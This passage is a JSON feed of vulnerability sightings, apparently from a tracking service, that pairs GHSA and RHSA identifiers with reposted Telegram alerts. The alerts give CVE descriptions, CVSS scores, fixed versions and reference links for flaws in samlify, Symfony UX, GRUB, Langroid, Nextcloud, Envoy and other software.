https://bugzilla.redhat.com/show_bug.cgi?id=2278875", "creation_timestamp": "2025-05-21T01:45:15.000000Z"}, {"uuid": "0108ab92-07f1-4fee-b728-107a4f0e405b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8CQW-MG7V-C9P9", "type": "seen", "source": "Telegram/kIu__LSWSF-lSSH53f04z2OEjKv8ykvXtTNiYc_9dOAOt4c", "content": "", "creation_timestamp": "2026-04-24T05:18:58.000000Z"}, {"uuid": "f7bc973e-f6ae-4a29-8e87-9daa148e6e06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-72QF-XRCW-FHR2", "type": "seen", "source": "Telegram/kIu__LSWSF-lSSH53f04z2OEjKv8ykvXtTNiYc_9dOAOt4c", "content": "", "creation_timestamp": "2026-04-24T05:18:58.000000Z"}, {"uuid": "79a4d7f8-da4c-4467-8276-c639d955cadf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q339-8RMV-2MHV", "type": "seen", "source": "Telegram/kIu__LSWSF-lSSH53f04z2OEjKv8ykvXtTNiYc_9dOAOt4c", "content": "", "creation_timestamp": "2026-04-24T05:18:58.000000Z"}, {"uuid": "70ce9567-4edc-4ec2-a2c1-aa66208582a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8C75-8MHR-P7R9", "type": "published-proof-of-concept", "source": "Telegram/KzwiN8QhKmj3TuqYtGeX9siiyoqjfAY8f7zipbE_z0Wiqhk", "content": "", "creation_timestamp": "2026-04-24T19:23:03.000000Z"}, {"uuid": "ef184766-5433-42fd-88e3-3055066202de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R683-V43C-6XQV", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16911", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47949\n\ud83d\udd25 CVSS Score: 9.9 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N)\n\ud83d\udd39 Description: samlify is a Node.js library for SAML single sign-on. A Signature Wrapping attack has been found in samlify prior to version 2.10.0, allowing an attacker to forge a SAML Response to authenticate as any user. An attacker would need a signed XML document by the identity provider. Version 2.10.0 fixes the issue.\n\ud83d\udccf Published: 2025-05-19T19:28:45.476Z\n\ud83d\udccf Modified: 2025-05-19T19:28:45.476Z\n\ud83d\udd17 References:\n1. https://github.com/tngan/samlify/security/advisories/GHSA-r683-v43c-6xqv\n2. https://github.com/tngan/samlify/commit/115679acd89f0a37ea3ebd8fff7db54fca3e8af3", "creation_timestamp": "2025-05-19T19:38:59.000000Z"}, {"uuid": "9a5f6df5-0cc6-4a48-b60a-74be1f823a34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GHM9-CR32-G9QJ", "type": "seen", "source": "Telegram/FGivxNz61ghqDj4ER4orUo942MC3d41x9N89ngSi7socZnE", "content": "", "creation_timestamp": "2026-04-24T19:23:26.000000Z"}, {"uuid": "6070c1c4-e2de-474f-88dc-eea4be010bf9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5J3W-5PCR-F8HG", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16915", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47946\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: Symfony UX is an initiative and set of libraries to integrate JavaScript tools into applications. Prior to version 2.25.1, rendering `{{ attributes }}` or using any method that returns a `ComponentAttributes` instance (e.g. `only()`, `defaults()`, `without()`) ouputs attribute values directly without escaping. If these values are unsafe (e.g. contain user input), this can lead to HTML attribute injection and XSS vulnerabilities. The issue is fixed in version `2.25.1` of `symfony/ux-twig-component` Those who use `symfony/ux-live-component` must also update it to `2.25.1` to benefit from the fix, as it reuses the `ComponentAttributes` class internally. As a workaround, avoid rendering `{{ attributes }}` or derived objects directly if it may contain untrusted values.\nInstead, use `{{ attributes.render('name') }}` for safe output of individual attributes.\n\ud83d\udccf Published: 2025-05-19T19:25:19.350Z\n\ud83d\udccf Modified: 2025-05-19T19:25:19.350Z\n\ud83d\udd17 References:\n1. https://github.com/symfony/ux/security/advisories/GHSA-5j3w-5pcr-f8hg\n2. https://github.com/symfony/ux/commit/b5d1c85995c128cb926d47a96cfbfbd500b643a8", "creation_timestamp": "2025-05-19T19:39:06.000000Z"}, {"uuid": "9592b0f0-5fa9-47e4-b766-8e01f875cf1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:6990", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/16979", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0690\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:P/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: The read command is used to read the keyboard input from the user, while reads it keeps the input length in a 32-bit integer value which is further used to reallocate the line buffer to accept the next character. During this process, with a line big enough it's possible to make this variable to overflow leading to a out-of-bounds write in the heap based buffer. This flaw may be leveraged to corrupt grub's internal critical data and secure boot bypass is not discarded as consequence.\n\ud83d\udccf Published: 2025-02-24T07:53:30.081Z\n\ud83d\udccf Modified: 2025-05-20T14:34:35.140Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:6990\n2. https://access.redhat.com/security/cve/CVE-2025-0690\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2346123\n4. https://lists.gnu.org/archive/html/grub-devel/2025-02/msg00024.html", "creation_timestamp": "2025-05-20T14:40:37.000000Z"}, {"uuid": "5571d029-bada-4e0f-b6f8-43d255c9c54c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PF86-5X62-JRWF", "type": "seen", "source": "Telegram/FGivxNz61ghqDj4ER4orUo942MC3d41x9N89ngSi7socZnE", "content": "", "creation_timestamp": "2026-04-24T19:23:26.000000Z"}, {"uuid": "d12f88e1-b9d0-40b4-9291-41e4c0c0fb9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HPPC-G8H3-XHP3", "type": "seen", "source": "Telegram/FGivxNz61ghqDj4ER4orUo942MC3d41x9N89ngSi7socZnE", "content": "", "creation_timestamp": "2026-04-24T19:23:26.000000Z"}, {"uuid": "25e45e74-b0d1-4dce-8fb8-4c49af378ae9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-44FP-W29J-9VJ5", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16918", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47935\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: Multer is a node.js middleware for handling `multipart/form-data`. Versions prior to 2.0.0 are vulnerable to a resource exhaustion and memory leak issue due to improper stream handling. When the HTTP request stream emits an error, the internal `busboy` stream is not closed, violating Node.js stream safety guidance. This leads to unclosed streams accumulating over time, consuming memory and file descriptors. Under sustained or repeated failure conditions, this can result in denial of service, requiring manual server restarts to recover. All users of Multer handling file uploads are potentially impacted. Users should upgrade to 2.0.0 to receive a patch. No known workarounds are available.\n\ud83d\udccf Published: 2025-05-19T19:18:38.018Z\n\ud83d\udccf Modified: 2025-05-19T19:18:38.018Z\n\ud83d\udd17 References:\n1. https://github.com/expressjs/multer/security/advisories/GHSA-44fp-w29j-9vj5\n2. https://github.com/expressjs/multer/pull/1120\n3. https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665", "creation_timestamp": "2025-05-19T19:39:12.000000Z"}, {"uuid": "21779323-1941-4195-b1a1-7978677a7361", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-22C2-9GWG-MJ59", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17024", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46725\n\ud83d\udd25 CVSS Score: 8.1 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: Langroid is a Python framework to build large language model (LLM)-powered applications. Prior to version 0.53.15, `LanceDocChatAgent` uses pandas eval() through `compute_from_docs()`. As a result, an attacker may be able to make the agent run malicious commands through `QueryPlan.dataframe_calc]`) compromising the host system. Langroid 0.53.15 sanitizes input to the affected function by default to tackle the most common attack vectors, and added several warnings about the risky behavior in the project documentation.\n\ud83d\udccf Published: 2025-05-20T17:24:31.618Z\n\ud83d\udccf Modified: 2025-05-20T17:24:31.618Z\n\ud83d\udd17 References:\n1. https://github.com/langroid/langroid/security/advisories/GHSA-22c2-9gwg-mj59\n2. https://github.com/langroid/langroid/commit/0d9e4a7bb3ae2eef8d38f2e970ff916599a2b2a6", "creation_timestamp": "2025-05-20T17:43:47.000000Z"}, {"uuid": "27c1229f-5988-4d4b-a89a-e3f75c5dfcea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XWGG-M7FX-83WX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16971", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47282\n\ud83d\udd25 CVSS Score: 9.9 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: Gardener External DNS Management is an environment to manage external DNS entries for a kubernetes cluster. A security vulnerability was discovered in Gardener's External DNS Management prior to version 0.23.6 that could allow a user with administrative privileges for a Gardener project or a user with administrative privileges for a shoot cluster, including administrative privileges for a single namespace of the shoot cluster, to obtain control over the seed cluster where the shoot cluster is managed. This CVE affects all Gardener installations no matter of the public cloud provider(s) used for the seed clusters/shoot clusters. The affected component is `gardener/external-dns-management`. The `external-dns-management` component may also be deployed on the seeds by the `gardener/gardener-extension-shoot-dns-service` extension when the extension is enabled. In this case, all versions of the `shoot-dns-service` extension `&lt;= v1.60.0` are affected by this vulnerability. Version 0.23.6 of Gardener External DNS Management fixes the issue.\n\ud83d\udccf Published: 2025-05-19T17:53:28.412Z\n\ud83d\udccf Modified: 2025-05-20T13:10:56.740Z\n\ud83d\udd17 References:\n1. https://github.com/gardener/external-dns-management/security/advisories/GHSA-xwgg-m7fx-83wx", "creation_timestamp": "2025-05-20T13:40:26.000000Z"}, {"uuid": "608b8663-cac0-41fe-bd5e-fbb8b73efae9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4278", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17098", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-4467\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the QEMU disk image utility (qemu-img) 'info' command. A specially crafted image file containing a `json:{}` value describing block devices in QMP could cause the qemu-img process on the host to consume large amounts of memory or CPU time, leading to denial of service or read/write to an existing external file.\n\ud83d\udccf Published: 2024-07-02T15:57:23.648Z\n\ud83d\udccf Modified: 2025-05-21T01:01:21.498Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4276\n2. https://access.redhat.com/errata/RHSA-2024:4277\n3. https://access.redhat.com/errata/RHSA-2024:4278\n4. https://access.redhat.com/errata/RHSA-2024:4372\n5. https://access.redhat.com/errata/RHSA-2024:4373\n6. https://access.redhat.com/errata/RHSA-2024:4374\n7. https://access.redhat.com/errata/RHSA-2024:4420\n8. https://access.redhat.com/errata/RHSA-2024:4724\n9. https://access.redhat.com/errata/RHSA-2024:4727\n10. https://access.redhat.com/security/cve/CVE-2024-4467\n11. https://bugzilla.redhat.com/show_bug.cgi?id=2278875", "creation_timestamp": "2025-05-21T01:45:15.000000Z"}, {"uuid": "98d60e17-79e5-4916-88ae-c0253ed842cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8JHR-WPCM-HH4H", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16433", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47783\n\ud83d\udd25 CVSS Score: 7.6 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:L/SI:L/SA:N)\n\ud83d\udd39 Description: Label Studio is a multi-type data labeling and annotation tool. A vulnerability in versions prior to 1.18.0 allows an attacker to inject a malicious script into the context of a web page, which can lead to data theft, session hijacking, unauthorized actions on behalf of the user, and other attacks. The vulnerability is reproducible when sending a properly formatted request to the `POST /projects/upload-example/` endpoint. In the source code, the vulnerability is located at `label_studio/projects/views.py`. Version 1.18.0 contains a patch for the issue.\n\ud83d\udccf Published: 2025-05-14T23:01:17.213Z\n\ud83d\udccf Modified: 2025-05-14T23:01:17.213Z\n\ud83d\udd17 References:\n1. https://github.com/HumanSignal/label-studio/security/advisories/GHSA-8jhr-wpcm-hh4h", "creation_timestamp": "2025-05-14T23:33:26.000000Z"}, {"uuid": "e68a6ccc-0784-434e-a847-604ecd40ec01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:4723", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/16436", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-7128\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in the OpenShift console. Several endpoints in the application use the authHandler() and authHandlerWithUser() middleware functions. When the default authentication provider (\"openShiftAuth\") is set, these functions do not perform any authentication checks, relying instead on the targeted service to handle authentication and authorization. This issue leads to various degrees of data exposure due to a lack of proper credential verification.\n\ud83d\udccf Published: 2024-07-26T13:34:19.647Z\n\ud83d\udccf Modified: 2025-05-15T01:20:55.218Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:4427\n2. https://access.redhat.com/errata/RHSA-2025:4723\n3. https://access.redhat.com/security/cve/CVE-2024-7128\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2300037", "creation_timestamp": "2025-05-15T01:32:34.000000Z"}, {"uuid": "19d0f240-7d08-40cd-b62b-dbe194595721", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:4427", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/16436", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-7128\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in the OpenShift console. Several endpoints in the application use the authHandler() and authHandlerWithUser() middleware functions. When the default authentication provider (\"openShiftAuth\") is set, these functions do not perform any authentication checks, relying instead on the targeted service to handle authentication and authorization. This issue leads to various degrees of data exposure due to a lack of proper credential verification.\n\ud83d\udccf Published: 2024-07-26T13:34:19.647Z\n\ud83d\udccf Modified: 2025-05-15T01:20:55.218Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:4427\n2. https://access.redhat.com/errata/RHSA-2025:4723\n3. https://access.redhat.com/security/cve/CVE-2024-7128\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2300037", "creation_timestamp": "2025-05-15T01:32:34.000000Z"}, {"uuid": "05522002-9717-46c0-91a7-18aaead60923", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QPJV-V59X-3QC4", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16435", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32421\n\ud83d\udd25 CVSS Score: 3.7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: Next.js is a React framework for building full-stack web applications. Versions prior to 14.2.24 and 15.1.6 have a race-condition vulnerability. This issue only affects the Pages Router under certain misconfigurations, causing normal endpoints to serve `pageProps` data instead of standard HTML. This issue was patched in versions 15.1.6 and 14.2.24 by stripping the `x-now-route-matches` header from incoming requests. Applications hosted on Vercel's platform are not affected by this issue, as the platform does not cache responses based solely on `200 OK` status without explicit `cache-control` headers. Those who self-host Next.js deployments and are unable to upgrade immediately can mitigate this vulnerability by stripping the `x-now-route-matches` header from all incoming requests at the content development network and setting `cache-control: no-store` for all responses under risk. The maintainers of Next.js strongly recommend only caching responses with explicit cache-control headers.\n\ud83d\udccf Published: 2025-05-14T22:56:45.624Z\n\ud83d\udccf Modified: 2025-05-14T22:56:45.624Z\n\ud83d\udd17 References:\n1. https://github.com/vercel/next.js/security/advisories/GHSA-qpjv-v59x-3qc4\n2. https://vercel.com/changelog/cve-2025-32421", "creation_timestamp": "2025-05-14T23:33:28.000000Z"}, {"uuid": "fbbac14d-e5d0-4056-b431-26b058c039ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9FWJ-9MJF-RHJ3", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/16574", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47275\n\ud83d\udd25 CVSS Score: 9.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: Auth0-PHP provides the PHP SDK for Auth0 Authentication and Management APIs. Starting in version 8.0.0-BETA1 and prior to version 8.14.0, session cookies of applications using the Auth0-PHP SDK configured with CookieStore have authentication tags that can be brute forced, which may result in unauthorized access. Certain pre-conditions are required to be vulnerable to this issue: Applications using the Auth0-PHP SDK, or the Auth0/symfony, Auth0/laravel-auth0, and Auth0/wordpress SDKs that rely on the Auth0-PHP SDK; and session storage configured with CookieStore. Upgrade Auth0/Auth0-PHP to v8.14.0 to receive a patch. As an additional precautionary measure, rotating cookie encryption keys is recommended. Note that once updated, any previous session cookies will be rejected.\n\ud83d\udccf Published: 2025-05-15T21:13:01.150Z\n\ud83d\udccf Modified: 2025-05-15T21:14:59.460Z\n\ud83d\udd17 References:\n1. https://github.com/auth0/auth0-PHP/security/advisories/GHSA-g98g-r7gf-2r25\n2. https://github.com/auth0/laravel-auth0/security/advisories/GHSA-9fwj-9mjf-rhj3\n3. https://github.com/auth0/symfony/security/advisories/GHSA-9wg9-93h9-j8ch\n4. https://github.com/auth0/wordpress/security/advisories/GHSA-2f4r-34m4-3w8q\n5. https://github.com/auth0/auth0-PHP/commit/52a79480fdb246f59dbc089b81a784ae049bd389\n6. https://github.com/auth0/auth0-PHP/releases/tag/8.14.0", "creation_timestamp": "2025-05-15T21:33:29.000000Z"}, {"uuid": "3108cad3-c835-4b8c-892e-438ba8655721", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-767M-XRHC-FXM7", "type": "seen", "source": "Telegram/u2qRHjnv5kQDuTkkxczYUuDfihUUcY0XYmdq7J3tY866RjI", "content": "", "creation_timestamp": "2026-04-23T23:27:29.000000Z"}, {"uuid": "8b7ad739-3298-4b1e-a610-59bbbdddbd84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-28G4-38Q8-3CWC", "type": "seen", "source": "Telegram/IhrbuMncMOQ2aXKn55DBnsRKZnrdzyQXI4i7tcZ3JysOVtE", "content": "", "creation_timestamp": "2026-04-23T23:27:16.000000Z"}, {"uuid": "d27cd91d-fc9c-47b6-a4e9-5a78652b292a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3QPV-XF3V-MM45", "type": "seen", "source": "Telegram/IhrbuMncMOQ2aXKn55DBnsRKZnrdzyQXI4i7tcZ3JysOVtE", "content": "", "creation_timestamp": "2026-04-23T23:27:16.000000Z"}, {"uuid": "64190db1-0bb3-4f86-ba48-f624e07ece68", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QM2F-959G-7P65", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16690", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47792\n\ud83d\udd25 CVSS Score: 5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N)\n\ud83d\udd39 Description: Nextcloud Desktop is the desktop sync client for Nextcloud. In versions of Nextcloud Desktop prior to 3.15, 3rdparty applications already installed on a user machine can create link shares for almost all data via the socket API. These shares can then be easily sent off to an external service. Nextcloud Desktop fixes the issue in version 3.15. No known workarounds are available.\n\ud83d\udccf Published: 2025-05-16T14:13:53.209Z\n\ud83d\udccf Modified: 2025-05-16T14:13:53.209Z\n\ud83d\udd17 References:\n1. https://github.com/nextcloud/security-advisories/security/advisories/GHSA-qm2f-959g-7p65\n2. https://github.com/nextcloud/desktop/pull/7517\n3. https://hackerone.com/reports/1995856", "creation_timestamp": "2025-05-16T14:39:40.000000Z"}, {"uuid": "d9262cd4-37d7-45a3-b74a-688f8e183353", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9H3W-F3H4-QQRH", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16692", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47790\n\ud83d\udd25 CVSS Score: 6.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: Nextcloud Server is a self hosted personal cloud system. Nextcloud Server prior to 29.0.15, 30.0.9, and 31.0.3 and Nextcloud Enterprise Server prior to 26.0.13.15, 27.1.11.15, 28.0.14.6, 29.0.15, 30.0.9, and 31.0.3 have a bug with session handling. The bug caused skipping the second factor confirmation after a successful login with the username and password when the server was configured with `remember_login_cookie_lifetime` set to `0`, once the session expired on the page to select the second factor and the page is reloaded. Nextcloud Server 29.0.15, 30.0.9, and 31.0.3 and Nextcloud Enterprise Server is upgraded to 26.0.13.15, 27.1.11.15, 28.0.14.6, 29.0.15, 30.0.9 and 31.0.3 contain a patch. As a workaround, set the `remember_login_cookie_lifetime` in config.php to a value other than `0`, e.g. `900`. Beware that this is only a workaround for new sessions created after the configuration change. System administration can delete affected sessions.\n\ud83d\udccf Published: 2025-05-16T14:02:57.806Z\n\ud83d\udccf Modified: 2025-05-16T14:02:57.806Z\n\ud83d\udd17 References:\n1. https://github.com/nextcloud/security-advisories/security/advisories/GHSA-9h3w-f3h4-qqrh\n2. https://github.com/nextcloud/server/pull/51905\n3. https://hackerone.com/reports/2729367", "creation_timestamp": "2025-05-16T14:39:44.000000Z"}, {"uuid": "c550d7d6-0248-45d8-a03f-04321dec03a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RP42-5VXX-QPWR", "type": "seen", "source": "Telegram/cyG2ZGhRnNebdsiXH3f8wG9rKkH4KFMg55z2RECZJhW1k7c", "content": "", "creation_timestamp": "2026-04-24T05:19:04.000000Z"}, {"uuid": "8f2b49ce-0981-4730-b5c9-a52794356744", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F9G8-6PPC-PQQ4", "type": "seen", "source": "Telegram/cyG2ZGhRnNebdsiXH3f8wG9rKkH4KFMg55z2RECZJhW1k7c", "content": "", "creation_timestamp": "2026-04-24T05:19:04.000000Z"}, {"uuid": "973f62d1-35d0-4586-82cb-7999f0e0fb98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V3QW-7VGV-2FXJ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17745", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-22402\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N)\n\ud83d\udd39 Description: Nextcloud guests app is a utility to create guest users which can only see files shared with them. In affected versions users were able to load the first page of apps they were actually not allowed to access. Depending on the selection of apps installed this may present a permissions bypass. It is recommended that the Guests app is upgraded to 2.4.1, 2.5.1 or 3.0.1. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2024-01-18T20:23:54.714Z\n\ud83d\udccf Modified: 2025-06-09T18:46:12.916Z\n\ud83d\udd17 References:\n1. https://github.com/nextcloud/security-advisories/security/advisories/GHSA-v3qw-7vgv-2fxj\n2. https://github.com/nextcloud/guests/pull/1082\n3. https://hackerone.com/reports/2251074", "creation_timestamp": "2025-06-09T19:48:04.000000Z"}, {"uuid": "4d9774e2-2920-4db7-bdbc-de04991b383d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4H5X-X9VH-M29J", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17748", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-23327\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: Envoy is a high-performance edge/middle/service proxy. When PPv2 is enabled both on a listener and subsequent cluster, the Envoy instance will segfault when attempting to craft the upstream PPv2 header. This occurs when the downstream request has a command type of LOCAL and does not have the protocol block. This issue has been addressed in releases 1.29.1, 1.28.1, 1.27.3, and 1.26.7. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2024-02-09T22:41:54.896Z\n\ud83d\udccf Modified: 2025-06-09T18:42:27.781Z\n\ud83d\udd17 References:\n1. https://github.com/envoyproxy/envoy/security/advisories/GHSA-4h5x-x9vh-m29j\n2. https://github.com/envoyproxy/envoy/commit/63895ea8e3cca9c5d3ab4c5c128ed1369969d54a", "creation_timestamp": "2025-06-09T19:48:10.000000Z"}, {"uuid": 